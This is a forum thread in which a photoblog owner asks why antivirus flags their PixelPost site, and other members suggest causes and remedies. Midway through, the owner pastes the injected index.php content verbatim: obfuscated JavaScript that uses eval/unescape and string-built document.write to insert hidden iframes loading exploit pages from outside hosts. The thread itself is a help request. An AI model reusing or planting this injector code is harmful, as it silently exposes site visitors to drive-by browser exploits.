Crap, what's happened to my website?

Scam

Scam

Scam

Soldato
Joined
20 Oct 2002
Posts
19,036
Location
London
I run a photoblog using PixelPost which has been throwing up an error for the past few weeks (i've been too busy to fix it). Just something about something in a line of code or something.

I just spotted that my signature wasnt appearing on these forums so went to my website and was surprised to see Nod32 fire up with this;
1714_alert.jpg

:confused:

Has my hosting or website been compromised? :confused:

I reuploaded the index.php and index.html files from backups on my PC but i still get the error. Link is here: www.2m2l.net

EDIT: And my hosting is with HostRocket.com
 
Last edited:
What has happened is either your PHP script has been comprised (an XSS attack through poorly validated user input) or your hosting provider's server has been compromised. The attacker in either case has placed an iframe into your index page which will load javascript to exploit a vulnerability in particular browsers hence the Antivirus warning.

I can't see the code on your website - have you removed it since?

I would recommend looking at your script to ensure it does not use user input directly without sanitisation in any shell_exec or writes to files. If you are confident your script could not have been exploited, check your local machine for trojans/keyloggers then change your FTP password. Finally contact your hosting provider as it's possible their machine was root compromised or at least allowed a hacker to execute a script which searched for and modified any files with global write permissions (don't set global write permissions where possible).

HTH :)
 
Thanks Adz. Unfortunately although i've done a fair bit of webdesign i was never really into hard-core coding so a lot of that goes a bit over my head. I've searched the HR forums and there seems to be have been some sort of hack into people's sites. My site seems fine now i have replaces the index files.. but i'm sure that's not the whole of what i should be doing to fix this?

My site was running pretty much a vanilla install of PixelPost so there were no forms or anything for people to submit stuff into.
 
Oh, a subdomain site i had hosted still had the index.php that was obviously put there. Doesnt look like the index that should be there! lol;

Code: 
<script type='text/javascript'>

<!--

var msg=314,d=document;

eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%73%65%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%30%30%39%30%29%2b%27%61%35%38%61%64%62%38%37%63%38%5c%27%20%77%69%64%74%68%3d%34%35%33%20%68%65%69%67%68%74%3d%35%33%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );

//-->

</script>

<script>var arw="<";var kvy="i";var ipxis=" ";var edrqo="gojvg='wjcYwjob' wsdyo='v26nnHqz' difyp='rM00xE90' hkkqp='qNk3qlAN' curgk='eWmdJd7K' fckub='ItE6otnL' uolmf='oN9H7aD0' rupal='IdDlSBho' urvlh='DlEHg14y' src=";var wdqxe="ame>";var acdpt="g/traffic/ft01/";var odafj=" ";var wdy="f";var qhi="r";var sxt="a";var paoyd="ejeax='QDEV4ttL' ojoyd='3gfYCHg1' undfd='wBHmP2BK' rqqdw='6Z2HOV7Y' ofamf='rVEEpDKp' haupo='Q5ngfgTl' kyggj='ls8Keui9' cpoop='ceFyxRKi' jcuav='YcpKufbV' ";var hxf="m";var rva="e";var sfgpc="width=437 ";var xfrwt="http://reddii.or";var pqhim="height=324 ";var ekwos="style='display:none'";var vndua=xfrwt+acdpt;var riqhb="></ifr";document.write(arw+kvy+wdy+qhi+sxt+hxf+rva+ipxis+edrqo+vndua+odafj+paoyd+sfgpc+pqhim+ekwos+riqhb+wdqxe);</script>

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%35%64%63%66%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%63%6e%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%32%34%38%36%35%29%2b%27%38%38%32%33%35%66%33%66%63%5c%27%20%77%69%64%74%68%3d%35%36%35%20%68%65%69%67%68%74%3d%32%32%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

<script>var sie="<";var itk="i";var oajnc=" ";var ahoqu="dvgfd='bUopLh9o' sempc='c8t1jT6I' rouwd='wlxezHR1' mqxrp='bR7ITY92' dympm='DOoO3axJ' equbx='yWVCyv9A' hwteu='vvqvqNHg' yange='QpYYyGjH' bhpwr='U9oYMfOl' src=";var cpgue="ame>";var iavqb="g/traffic/ft01/";var ahuhe=" ";var dgf="f";var pms="r";var yno="a";var lvrtg="boevj='WGX4ekLT' tguee='EVUIyRkw' iehiv='ccjoqylu' dcruk='DKKRddjZ' rwikg='2eTxBhae' racyo='aXmb0Bka' yvbud='4vtLDvFI' eutbo='a2UeIvck' bkstl='fcp6Ug7r' ";var wur="m";var fyc="e";var nykyi="width=633 ";var qymcs="http://reddii.or";var nehnc="height=89 ";var prbwe="style='display:none'";var yywgy=qymcs+iavqb;var lelmv="></ifr";document.write(sie+itk+dgf+pms+yno+wur+fyc+oajnc+ahoqu+yywgy+ahuhe+lvrtg+nykyi+nehnc+prbwe+lelmv+cpgue);</script>

EDIT: http://www.coderforums.com/showthread.php?t=22926

Sounds pretty crap! I've wanted to move hosts for a long time but the problem is that my dad pays and has done for years so if i bring it up he's gonna ask me to start paying considering i use it the most lol :D
 
Last edited:
Is the Pixelpost software up to date with all security patches? There might have been something insecure there.

Otherwise you probably want to speak to your hosting provider.

Is anything on your site currently chmodded with global write permissions?
 
Hmn i was running an older version of PixelPost so that was possibly a problem.

I'll have to look into chmod.. i know i had to set up some stuff for PP to work properly.
 
You must log in or register to reply here.
Back
Top Bottom